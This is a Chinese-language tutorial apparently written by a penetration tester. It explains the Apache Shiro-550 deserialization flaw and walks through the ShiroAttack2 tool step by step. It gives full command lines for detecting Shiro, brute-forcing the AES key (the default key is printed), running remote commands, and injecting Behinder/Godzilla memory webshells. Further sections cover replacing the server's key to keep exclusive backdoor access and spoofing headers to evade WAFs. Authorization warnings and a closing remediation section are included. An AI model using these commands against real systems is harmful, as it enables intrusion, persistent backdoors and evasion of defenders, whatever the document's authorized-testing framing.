1. 项目概述:为什么ShiroAttack2依然是渗透测试的“瑞士军刀”?
在Java安全领域,Apache Shiro框架的反序列化漏洞(Shiro-550)绝对是一个“常青树”级别的存在。从2016年被披露至今,它依然活跃在大量授权渗透测试和红队演练的报告中。这背后的原因,远不止一个简单的CVE编号那么简单。作为一名长期在一线进行安全评估的从业者,我见过太多因为Shiro默认配置、老旧框架版本或运维疏忽而导致的“大门敞开”的场景。今天要聊的ShiroAttack2,就是针对这个经典漏洞的一款集大成式利用工具。它不仅仅是一个漏洞利用脚本,更是一个集探测、密钥爆破、利用链选择、命令执行、内存马注入乃至密钥替换于一体的自动化武器库。对于安全研究人员和授权渗透测试工程师而言,掌握它,就等于掌握了一把高效打开Shiro防护大门的钥匙。
ShiroAttack2的核心价值在于其“一体化”和“自动化”。它把原本需要手动拼接的多个步骤——从发送一个特殊的Cookie判断Shiro是否存在,到遍历上百个可能的AES密钥,再到根据目标环境选择合适的反序列化利用链(Gadget),最后执行命令或植入内存马——全部整合到了一个流畅的流程中。无论是通过其直观的JavaFX图形界面(GUI)点选操作,还是通过命令行接口(CLI)嵌入自动化脚本,它都能显著提升测试效率。更重要的是,它的设计紧跟实战变化,支持了包括CBC和GCM两种AES加密模式、多种CommonsBeanutils利用链变体,以及当前主流的冰蝎、哥斯拉等内存马,确保了在复杂多变的真实环境中依然有很高的成功率。
接下来,我将以一个授权测试场景为例,带你从零开始,用五个核心步骤,彻底掌握ShiroAttack2的使用精髓、背后的原理,以及那些只有踩过坑才知道的实战技巧。
2. 核心原理与攻击流程拆解:Shiro-550漏洞为何“经久不衰”?
在动手之前,我们必须理解ShiroAttack2所针对的漏洞本质。知其然,更要知其所以然,这能帮助我们在工具失效或遇到障碍时,自己找到排查和解决的方向。
2.1 Shiro-550漏洞的根源:RememberMe功能的“阿喀琉斯之踵”
Apache Shiro是一个强大且易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。其“记住我”(RememberMe)功能本是为了提升用户体验,允许用户在关闭浏览器后再次访问时无需重新登录。这个功能的实现,成为了漏洞的源头。
其核心流程如下:
- 序列化与加密:当用户成功登录并勾选“记住我”后,Shiro会将用户的身份信息(如
SimplePrincipalCollection)进行Java序列化。 - 使用AES加密:序列化后的字节流,会使用一个预先配置的AES密钥进行加密。
- 存入Cookie:加密后的密文,经过Base64编码,作为
rememberMe这个Cookie的值发送给浏览器保存。 - 解密与反序列化:用户再次访问时,浏览器会带上这个Cookie。Shiro服务端会对其进行Base64解码、AES解密,最后将解密后的字节流进行Java反序列化,还原出用户身份信息,从而实现自动登录。
漏洞就出在AES密钥和反序列化这两个环节上。
第一,默认密钥的“遗产”问题。在Shiro 1.2.4及更早的版本中,框架在CookieRememberMeManager类里硬编码了一个默认的AES密钥:kPH+bIxk5D2deZiIxcaaaA==。这个密钥随着Shiro的教程、示例代码和无数互联网上的“脚手架”项目被广泛传播和复制。许多开发者在部署应用时,要么直接使用了这个默认密钥,要么从网上拷贝了一段包含此密钥的配置代码而未作修改。这就导致攻击者可以直接使用这个公开的密钥来尝试解密。
第二,密钥更换的“惰性”与复杂性。即使开发者意识到了风险,更换密钥也并非易事。rememberMe的加密和解密必须使用同一个密钥。一旦这个密钥被写死在应用的配置文件、打包进了Docker镜像、或者提交到了代码仓库,要更换它就需要在所有部署节点上同步更新,并重启服务。对于大型分布式应用或运维流程不完善的项目,这是一个容易被人忽略或推迟的“麻烦事”。
第三,极低的利用门槛。漏洞的利用过程可以被高度工具化。攻击者无需深入理解AES加密或Java序列化的复杂细节,只需要一个像ShiroAttack2这样的工具,输入目标地址,点击按钮,工具就能自动完成探测、密钥爆破、利用链选择和攻击。这种“低技术门槛、高破坏性”的特性,使得该漏洞长期活跃。
2.2 ShiroAttack2的攻击流程全景图
ShiroAttack2将整个攻击流程自动化,其内部逻辑可以清晰地分为以下几个阶段,理解它们对后续的实操和排错至关重要:
探测阶段:工具会向目标发送一个特殊的HTTP请求,其中包含一个
rememberMeCookie,但其值是一个无效的或格式错误的密文(例如yes)。如果目标服务是存在漏洞的Shiro框架,它在处理非法Cookie时,会在响应头中返回一个Set-Cookie: rememberMe=deleteMe。这是一个非常关键的特征。因为Shiro 1.x版本对于无法处理的rememberMeCookie,会固定返回此响应来清除客户端的Cookie。这个行为成为了一个可靠的指纹。密钥爆破/验证阶段:确认目标为Shiro后,工具进入核心环节——获取AES密钥。它会构造一个特定的Java对象(通常是
SimplePrincipalCollection)并将其序列化。然后,工具会加载一个密钥字典(如自带的data/shiro_keys.txt),用字典中的每一个密钥尝试对序列化后的数据进行AES加密,生成一个rememberMeCookie并发送给目标。- 关键逻辑:如果服务端使用该密钥成功解密并反序列化了数据(即使反序列化后对象不合法),它就不会返回
deleteMe。反之,如果密钥错误,解密会失败,服务端会像探测阶段一样返回deleteMe。因此,“没有返回deleteMe”就等同于“密钥正确”。工具通过这种方式暴力猜解或验证密钥。
- 关键逻辑:如果服务端使用该密钥成功解密并反序列化了数据(即使反序列化后对象不合法),它就不会返回
利用链(Gadget)构造与选择阶段:拿到正确的AES密钥后,攻击才真正开始。工具需要构造一个恶意的序列化数据(即Gadget链),当它在服务端被反序列化时,能够执行任意代码。ShiroAttack2内置了多种Gadget链,主要围绕
commons-beanutils库的不同版本(如1.8.3, 1.9.2)及其变体(如AttrCompare,ObjectToStringComparator)。这些变体的价值在于,它们可能不依赖特定的commons-collections库版本,从而提高了在目标环境中的兼容性和成功率。工具通常会采用“智能探测”策略,优先尝试通用性更高的变体。载荷执行阶段:根据用户选择的攻击模式,工具会执行不同操作:
- 命令执行:将构造好的Gadget链(其中包含一个用于执行命令的类,如
TemplatesImpl)用正确的AES密钥加密,放入rememberMeCookie中发送。需要执行的系统命令,通常会被编码后放在HTTP请求的Authorization或Cmd等自定义头部中,由Gadget链在服务端读取并执行,最后将结果回显在HTTP响应里。 - 内存马注入:原理类似,但Gadget链的最终作用是向目标Web容器的运行时(如Tomcat的
Filter链、Servlet上下文)动态注册一个恶意的Filter或Servlet。这个内存马会拦截所有请求,攻击者通过访问特定的URL路径并携带密码,就能实现持续的远程控制。注入成功后,后续攻击不再需要rememberMeCookie。
- 命令执行:将构造好的Gadget链(其中包含一个用于执行命令的类,如
密钥替换(可选):这是一个更高级的“持久化”后门技术。在成功注入内存马的基础上,工具可以进一步利用内存马的能力,动态修改服务端Shiro框架正在使用的AES密钥。这样,即使原漏洞被修复(密钥被更改),攻击者因为拥有新的密钥,依然可以保持访问权限。而其他不知道新密钥的人则无法再利用该漏洞。
注意:以上所有技术细节和工具使用,必须且仅限于你拥有明确书面授权的测试目标。未经授权的测试是违法行为,会面临严重的法律后果。工具自带的免责声明绝非儿戏,它划定了法律和道德的边界。
3. 环境准备与工具获取:搭建你的安全测试工作台
工欲善其事,必先利其器。使用ShiroAttack2前,我们需要准备好相应的运行环境,并正确获取工具本身。
3.1 Java运行环境配置
ShiroAttack2是一个Java应用程序,因此首要条件是安装合适的Java运行时环境(JRE)或开发工具包(JDK)。
- 版本要求:根据项目的Release说明,ShiroAttack2主要支持Java 8。虽然更高版本的Java(如11, 17)可能也能运行,但由于Java本身对反序列化漏洞的利用有版本限制(例如高版本Java引入了模块化和更严格的安全管理器),且工具依赖的某些库可能兼容性不佳,因此强烈建议使用Java 8以保证最大的稳定性和兼容性。
- 如何安装:
- 前往Oracle官网或AdoptOpenJDK等开源站点下载Java 8的JDK安装包。
- 按照操作系统指引完成安装。
- 配置系统环境变量
JAVA_HOME,指向你的JDK安装目录(例如C:\Program Files\Java\jdk1.8.0_381)。 - 将
%JAVA_HOME%\bin添加到系统的PATH环境变量中。
- 验证安装:打开命令行终端(CMD, PowerShell, Bash等),输入
java -version并回车。你应该能看到类似java version "1.8.0_381"的输出,这表示环境已就绪。
3.2 获取ShiroAttack2的发布版本
最可靠的方式是从其GitHub仓库的Releases页面下载预编译好的版本。这比从源码构建要简单快捷得多。
- 访问 ShiroAttack2 的 GitHub Releases 页面(通常地址为
https://github.com/SummerSec/ShiroAttack2/releases)。 - 在最新的Release资产(Assets)中,你会看到两种类型的文件:
shiro_attack-<version>-<jdk>.jar:这是一个“胖JAR”(Fat JAR)或“可执行JAR”,它已经包含了运行所需的大部分依赖。这是最常用的单文件版本。shiro_attack-<version>-<jdk>-bundle.zip:这是一个完整的工具包,除了可执行JAR,还包含了必要的data/目录(存放密钥字典)和lib/目录(存放特定版本的commons-beanutils等依赖库)。如果你遇到某些Gadget链因缺少特定库版本而无法使用的情况,可能需要下载这个完整包。
- 对于大多数情况,直接下载
shiro_attack-5.1.1-jdk8.jar这样的单JAR文件即可。将其保存到你方便访问的目录,例如D:\tools\shiroattack2\。
3.3 目录结构与关键文件说明
如果你下载的是-bundle.zip压缩包,或者想手动组织文件,你需要了解以下标准目录结构:
你的工作目录/ ├── shiro_attack-5.1.1-jdk8.jar # 主程序JAR文件 ├── data/ # 数据目录(可自动生成或从zip包获取) │ └── shiro_keys.txt # AES密钥字典文件,每行一个Base64编码的密钥 └── lib/ # 依赖库目录(从zip包获取) ├── commons-beanutils-1.8.3.jar ├── commons-beanutils-1.9.2.jar └── ...其他jar文件shiro_keys.txt:这是工具进行密钥爆破的字典。工具自带了一个包含常见密钥的字典。但在实战中,根据目标情况扩充这个字典非常重要。你可以从互联网上收集更多历史泄露的、常用的或弱口令类型的Shiro密钥,追加到这个文件中,一行一个。lib/目录:里面存放了不同版本的commons-beanutils库。这是因为不同的Gadget链依赖于特定版本的库。工具在运行时,会根据选择的Gadget链动态从这个目录加载对应的JAR文件到类路径中。如果这个目录缺失或不全,可能会导致某些利用链无法使用。
实操心得:我个人的习惯是,总是使用-bundle.zip版本,并解压到固定目录。这样能确保data和lib目录齐全。然后,我会定期更新shiro_keys.txt,将一些在GitHub、代码仓库中偶然发现的疑似Shiro密钥也添加进去。有时候,一次成功的攻击就源于字典里多出的那一个密钥。
4. 五步实战:从探测到内存马注入
假设我们已获得对目标http://vuln-target.com的书面授权,现在开始进行安全测试。我们将分别使用GUI和CLI两种模式,完成一次完整的漏洞利用。
4.1 第一步:启动与目标探测
GUI模式启动: 在存放shiro_attack-xxx.jar的目录下,打开命令行,执行:
java -jar shiro_attack-5.1.1-jdk8.jar如果一切正常,将会弹出ShiroAttack2的图形界面。界面主要分为几个区域:目标地址输入、攻击模式选择、参数配置、日志输出等。
CLI模式基础命令: 如果你更喜欢命令行,或者需要将测试集成到自动化脚本中,可以使用CLI模式。所有操作都通过子命令完成。
# 基本格式 java -cp shiro_attack-5.1.1-jdk8.jar com.summersec.attack.CLI.MainCLI <子命令> [选项] -u <目标URL>进行探测: 在GUI中,在“Target”输入框填入http://vuln-target.com,然后点击左上角的“Detect”按钮(或勾选“Detect”选项后点击“Attack”)。 在CLI中,使用detect子命令:
java -cp shiro_attack-5.1.1-jdk8.jar com.summersec.attack.CLI.MainCLI detect -u http://vuln-target.com结果解读:
- 成功探测:日志中会显示
[+] Shiro detect success: true,并且可能会看到Found Shiro in response headers: rememberMe=deleteMe。这明确表示目标使用了存在漏洞的Shiro框架。 - 失败探测:如果返回
false,且没有deleteMe特征,可能目标不是Shiro,或者Shiro版本较高(1.3+)在某些配置下不返回deleteMe。此时不能完全排除风险,但直接利用难度增大。
注意事项:探测请求可能会被WAF(Web应用防火墙)拦截。如果目标有WAF,你可能会收到403 Forbidden等错误。此时需要考虑在工具中配置HTTP代理(如Burp Suite)进行流量转发,或者使用
--header选项添加一些伪装头部,这在后续的“高级技巧”部分会提到。
4.2 第二步:爆破AES密钥
确认目标存在Shiro后,下一步就是获取加密密钥。
GUI操作:
- 确保目标地址已填好。
- 在“Attack Type”区域选择“Crack”。
- 点击“Attack”按钮。
CLI操作:
java -cp shiro_attack-5.1.1-jdk8.jar com.summersec.attack.CLI.MainCLI crack -u http://vuln-target.com过程与原理: 工具会读取data/shiro_keys.txt文件,逐行取出密钥,用每个密钥去加密一个固定的序列化载荷,并发送请求。通过判断响应中是否包含deleteMe来确认密钥是否正确。这个过程中,工具会自动尝试两种AES模式:
- CBC模式:对应Shiro 1.2.4及更早版本的默认加密方式。
- GCM模式:Shiro 1.2.5及以上版本为了安全,将默认模式改为了GCM。
结果解读:
- 成功爆破:日志会显示类似
[+] Key found: kPH+bIxk5D2deZiIxcaaaA== (AES-CBC)的信息。这表示找到了正确的密钥及其使用的加密模式。这是整个攻击中最关键的一步。 - 失败:如果字典中的所有密钥都尝试失败,日志会提示未找到密钥。此时你需要:
- 检查
data/shiro_keys.txt文件是否存在且可读。 - 考虑扩充你的密钥字典。网络上有很多公开的Shiro密钥集合。
- 考虑目标是否使用了完全自定义的、不在任何公开字典中的密钥。这种情况下,除非能通过其他途径(如源码泄露)获取,否则此路不通。
- 检查
实操心得:爆破速度很快,通常几秒到一分钟内就能完成。如果目标响应慢,可以适当调整--timeout参数。成功获取密钥后,务必记录下来。这个密钥不仅用于本次攻击,如果目标不更换密钥,它在未来一段时间内可能依然有效。
4.3 第三步:尝试命令执行
拿到密钥后,我们就可以尝试执行系统命令,验证漏洞的危害性。
GUI操作:
- 在“Attack Type”区域选择“Exec”。
- 在“Command”输入框填入你想执行的命令,例如
whoami(Linux)或whoami(Windows)。 - 点击“Attack”。
CLI操作:
java -cp shiro_attack-5.1.1-jdk8.jar com.summersec.attack.CLI.MainCLI exec -u http://vuln-target.com -k “kPH+bIxk5D2deZiIxcaaaA==” --gadget CB192 --cmd “whoami”-k:指定上一步找到的密钥。--gadget:指定使用的反序列化利用链。CB192代表commons-beanutils:1.9.2。如果不指定,工具会尝试自动探测。--cmd:指定要执行的系统命令。
过程与原理: 工具会使用指定的密钥和Gadget链,构造一个恶意的序列化对象。这个对象被反序列化后,会执行一个Runtime.getRuntime().exec(cmd)之类的操作。命令执行的结果,会被工具通过某种“回显”技术嵌入到HTTP响应包中传回。ShiroAttack2支持多种回显技术,如TomcatEcho、SpringEcho等,它会根据目标环境自动选择最可能成功的一种。
结果解读:
- 成功:在日志或返回结果区域,你会看到命令的执行结果,例如
root或nt authority\system。这证明漏洞利用成功,并且你已具备了在目标服务器上执行任意命令的能力。 - 失败:可能显示“Exploit failed”或没有回显。失败原因可能很复杂:
- Gadget链不兼容:目标服务器上缺少Gadget链依赖的特定版本库(如
commons-beanutils-1.9.2.jar)。可以尝试更换--gadget参数,例如换成CB183(1.8.3版本)或ObjectToStringComparator(一种不依赖CC链的变体)。 - Java版本限制:高版本Java(如11+)对反序列化有更多限制,某些Gadget链可能失效。
- 安全软件拦截:服务器上的杀毒软件或HIDS(主机入侵检测系统)拦截了恶意进程的创建。
- 命令回显问题:回显通道被WAF过滤或网络策略阻断。
- Gadget链不兼容:目标服务器上缺少Gadget链依赖的特定版本库(如
重要安全提醒:在授权测试中,执行命令需格外谨慎。避免使用
rm -rf /、format等破坏性命令。通常,执行whoami、ipconfig/ifconfig、netstat -an等信息收集命令是第一步。同时,你的所有操作都应该在授权范围内,并记录在测试报告中。
4.4 第四步:注入内存马(持久化控制)
命令执行是“一次性”的。为了获得一个持久的、隐蔽的后门,我们需要注入内存马。
GUI操作:
- “Attack Type”选择“Memshell”。
- 在“Memshell Type”中选择类型,例如“Filter”(兼容性最好)。
- 在“Password”中输入连接密码,例如
pass123。 - 在“Path”中输入内存马绑定的URL路径,例如
/evil。 - 选择“Shell Type”,如“Behinder”(冰蝎)、“Godzilla”(哥斯拉)或“AntSword”(蚁剑)。这决定了你后续用什么客户端来连接。
- 点击“Attack”。
CLI操作(以注入冰蝎Filter内存马为例):
java -cp shiro_attack-5.1.1-jdk8.jar com.summersec.attack.CLI.MainCLI memshell -u http://vuln-target.com -k “<your_key>” --gadget CB192 --type filter --path /evil --password pass123 --shelltype behinder过程与原理: 工具会构造一个特殊的Gadget链。这个链在反序列化后,不会执行一次性命令,而是会利用Java的反射机制,向当前运行的Web容器(如Tomcat)动态注册一个恶意的Filter。这个Filter会拦截所有请求。当攻击者访问特定的路径(如/evil)并携带正确的密码时,Filter会识别并接管请求,允许攻击者通过加密的通道上传和执行命令,实现持续控制。内存马存在于服务器的JVM内存中,不写入磁盘,因此常规文件扫描难以发现。
结果解读与验证:
- 成功注入:工具日志会显示“Memshell injected successfully”。
- 验证与连接:
- 使用对应的WebShell客户端(如冰蝎)。
- 配置连接地址为
http://vuln-target.com/evil,密码为pass123。 - 尝试连接。如果连接成功,即可在客户端中进行文件管理、命令执行等操作。
实操心得:Filter类型的内存马兼容性最好,但Servlet或Interceptor类型在某些特定框架下可能更稳定。注入后,务必记录下路径和密码。内存马会随着服务器重启而消失,属于“非持久化”后门,但在测试期间非常有用。在测试结束后,应通过重启应用服务器等方式主动清除内存马。
4.5 第五步:(可选)密钥替换——巩固后门
这是一个更高级的操作。假设我们已经通过内存马获得了控制权,我们可以进一步“偷梁换柱”,修改Shiro服务端本身的AES密钥。
CLI操作:
java -cp shiro_attack-5.1.1-jdk8.jar com.summersec.attack.CLI.MainCLI changekey -u http://vuln-target.com -k “<old_key>” --newkey “<your_new_key>”过程与原理: 这个功能依赖于已成功注入的内存马(通常是Filter类型)。工具会通过内存马提供的通道,向服务器发送指令,利用Java的反射技术,找到Shiro框架中存储AES密钥的静态变量或属性,并将其值修改为攻击者指定的新密钥。
结果与影响:
- 成功替换:日志提示密钥替换成功。之后,只有使用新密钥
<your_new_key>才能成功利用Shiro的RememberMe漏洞。原来的旧密钥<old_key>立即失效。 - 深远影响:这意味着,即使目标系统管理员发现了漏洞,并仅仅是通过修改配置文件中的密钥来修复,只要他没有重启服务(因为旧密钥可能还留在内存中),或者没有发现内存马,攻击者凭借新密钥依然可以维持访问。而其他攻击者由于不知道新密钥,则无法利用此漏洞。这相当于攻击者“独占”了这个后门。
警告:此操作风险极高,且极具侵略性。在真实的授权测试中,是否执行此步骤必须与客户进行充分沟通并获得明确许可。因为它本质上是在主动修改目标系统的运行状态,可能带来不可预知的风险,也超出了常规漏洞验证的范畴。
5. 高级技巧与深度排错指南
掌握了基本五步,你已能应对大部分场景。但在复杂的真实网络环境中,你会遇到各种“拦路虎”。下面分享一些进阶技巧和排错经验。
5.1 绕过WAF与流量伪装
WAF是Shiro漏洞利用的最大障碍之一。它们会检测rememberMe、Cookie长度、异常请求特征等。
ShiroAttack2内置策略:
- POST型探测:默认探测使用GET请求。某些WAF对GET请求的Cookie检测更严。可以尝试使用
--post参数,工具会改用POST请求发送Cookie,有时能绕过简单规则。java -cp shiro_attack.jar com.summersec.attack.CLI.MainCLI detect -u http://target.com --post - 自定义请求头:添加一些常见的、看似正常的HTTP头部,可以降低请求的“可疑度”。
java -cp shiro_attack.jar com.summersec.attack.CLI.MainCLI crack -u http://target.com --header “X-Forwarded-For: 127.0.0.1” --header “User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36”
外部代理配合: 最有效的方法是配合Burp Suite等代理工具。
- 启动Burp Suite,配置监听代理(如127.0.0.1:8080)。
- 在ShiroAttack2 GUI的“Proxy”设置中,填入Burp的代理地址和端口。
- 所有从ShiroAttack2发出的流量都会经过Burp。
- 在Burp中,你可以:
- 观察和修改请求:手动修改Cookie的格式、拆分请求等,以绕过WAF规则。
- 使用Intruder进行模糊测试:如果工具自带的字典爆破失败,可以用Burp Intruder加载更大的密钥字典进行爆破。
- 测试编码绕过:对
rememberMe的Base64值进行二次编码(如URL编码)后发送。
实操心得:遇到WAF拦截,首先用Burp抓包,看看原始请求是什么样的,WAF返回了什么错误码或页面。然后尝试最简单的改动,比如把Cookie: rememberMe=xxx改成Cookie: rememberMe=xxx; other=yyy,或者添加一个Referer头指向目标网站自身。很多时候,简单的伪装就足以绕过基于简单规则的WAF。
5.2 Gadget链选择与依赖问题
“Exploit failed”很多时候是Gadget链不兼容导致的。
自动探测与手动指定: ShiroAttack2的exec和memshell命令在不指定--gadget时,会尝试自动探测。其逻辑通常是:
- 优先尝试
ObjectToStringComparator或AttrCompare等变体,因为它们不依赖外部的commons-collections库,成功率相对较高。 - 如果失败,再回退到传统的
CommonsBeanutils链(CB183, CB192)。
如果自动探测失败,你应该手动指定Gadget链:
# 尝试不同链 java -cp shiro_attack.jar com.summersec.attack.CLI.MainCLI exec -u http://target.com -k “<key>” --gadget ObjectToStringComparator --cmd “whoami” java -cp shiro_attack.jar com.summersec.attack.CLI.MainCLI exec -u http://target.com -k “<key>” --gadget CB183 --cmd “whoami”确保依赖库存在:CommonsBeanutils链需要对应的JAR文件。如果你使用的是单JAR版本,这些库已打包在内。但如果使用-bundle.zip版本,请确保lib/目录下存在相应的JAR文件(如commons-beanutils-1.9.2.jar)。如果缺失,你需要手动下载并放入。
Java版本兼容性: 高版本Java(如JDK 11+)对反序列化引入了更多限制,例如sun.misc.Unsafe类的使用受限、模块化系统等。这可能导致许多传统的Gadget链失效。如果目标环境是Java高版本,可能需要寻找或研究新的、针对高版本Java的利用链,这可能超出了ShiroAttack2当前内置的能力范围。
5.3 典型错误与解决方案速查表
下表汇总了使用ShiroAttack2时常见的错误现象、可能原因及解决思路:
| 现象 | 可能原因 | 排查步骤与解决方案 |
|---|---|---|
探测失败,无deleteMe | 1. 目标不是Shiro框架。 2. Shiro版本>=1.3且配置不返回 deleteMe。3. 网络不通或目标服务宕机。 4. WAF拦截了探测请求。 | 1. 用其他指纹识别工具确认。 2. 尝试直接进行密钥爆破( crack),有时即使无deleteMe特征,密钥爆破仍可能成功。3. 检查网络和端口。 4. 使用代理,尝试流量伪装。 |
| 密钥爆破失败 | 1. 密钥字典shiro_keys.txt不包含正确密钥。2. 目标使用了GCM模式,而工具只尝试了CBC(或反之)。 3. WAF拦截了爆破请求。 | 1. 扩充密钥字典。 2. ShiroAttack2会自动尝试CBC和GCM,确认日志中两种模式都尝试过。 3. 使用代理,降低请求频率( --delay),或分批测试。 |
| 命令执行无回显 | 1. 选择的Gadget链不兼容目标环境。 2. 命令执行被安全软件拦截。 3. 回显方式被WAF过滤。 4. 目标Java版本过高。 | 1. 手动更换--gadget参数,尝试其他链。2. 尝试执行无害命令如 echo test。3. 尝试使用 --echo参数指定其他回显类型,如SpringEcho。4. 考虑使用DNSLog等外带通道验证命令是否执行。 |
| 内存马注入成功但无法连接 | 1. 内存马路径或密码错误。 2. 内存马类型与Web容器不兼容。 3. 客户端配置错误(如冰蝎版本、密码编码)。 4. 内存马被注入后,后续请求被其他安全组件拦截。 | 1. 仔细核对注入时使用的--path和--password。2. 尝试注入 Servlet或Interceptor类型的内存马。3. 确保WebShell客户端配置正确,密码一致。 4. 尝试直接访问内存马路径,看是否有异常响应。 |
| 工具启动报错或界面空白 | 1. Java版本不兼容(非Java 8)。 2. 缺少JavaFX运行时(对于GUI)。 3. JAR文件损坏。 | 1. 切换至Java 8环境。 2. 对于OpenJDK用户,可能需要单独安装 openjfx包。或直接使用CLI模式。3. 重新下载JAR文件。 |
5.4 从利用到修复:安全人员的闭环思维
作为一名负责任的安全人员,我们的工作不止于“利用成功”。在授权测试中,发现漏洞后,更重要的是协助客户理解风险并修复它。
漏洞验证报告: 在你的测试报告中,对于Shiro-550漏洞,至少应包含:
- 漏洞描述:清晰说明Shiro RememberMe反序列化漏洞的原理。
- 风险等级:通常为“高危”或“严重”。
- 影响证明:提供密钥爆破成功的截图、命令执行结果的截图。这是最关键的证据。
- 修复建议:
- 立即措施:重启应用服务器,清除可能已注入的内存马。
- 根本解决:
- 升级Shiro:将Apache Shiro升级到最新安全版本(至少1.5.3以上,并关注后续CVE)。
- 更换密钥:在Shiro配置文件中,将
rememberMe的cipherKey属性设置为一个足够复杂且唯一的Base64编码密钥。切勿使用默认密钥或网上公开的密钥。 - 禁用RememberMe:如果业务不需要,直接在配置中禁用
rememberMe功能。 - 更新依赖:确保项目中的
commons-beanutils等库也更新至无漏洞版本。
- 安全加固:在WAF或网关层面设置规则,拦截异常的
rememberMeCookie请求。
通过ShiroAttack2这个强大的工具,我们能够高效地验证Shiro-550漏洞的存在与危害。但请永远记住,能力越大,责任越大。所有技术都应在法律和道德允许的范围内,用于建设更安全的网络环境。希望这篇从原理到实战,再到排错与反思的详细指南,能帮助你在授权测试的道路上更加专业、稳健。
